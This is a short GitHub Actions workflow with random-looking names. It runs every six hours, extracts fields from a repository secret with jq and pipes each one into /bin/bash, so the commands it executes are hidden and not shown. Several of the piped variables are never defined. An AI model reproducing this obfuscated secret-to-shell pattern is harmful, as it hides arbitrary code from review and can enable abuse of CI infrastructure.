name: nongfeiting1524
on:
  workflow_dispatch:
  schedule:
    - cron: '23 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: nongfeiting1524
        env:
          ms5: ${{ secrets.ms5 }}
        run: |
          echo $ms5 | jq -r .h5467 | /bin/bash
          echo $a3 | jq -r .u1 | /bin/bash
          echo $m2759 | jq -r .dch4 | /bin/bash
          echo $jnveu0 | jq -r .iqucw3 | /bin/bash
          echo $jfj0032 | jq -r .zhnq2653 | /bin/bash
          echo $lro492 | jq -r .nzk17097 | /bin/bash

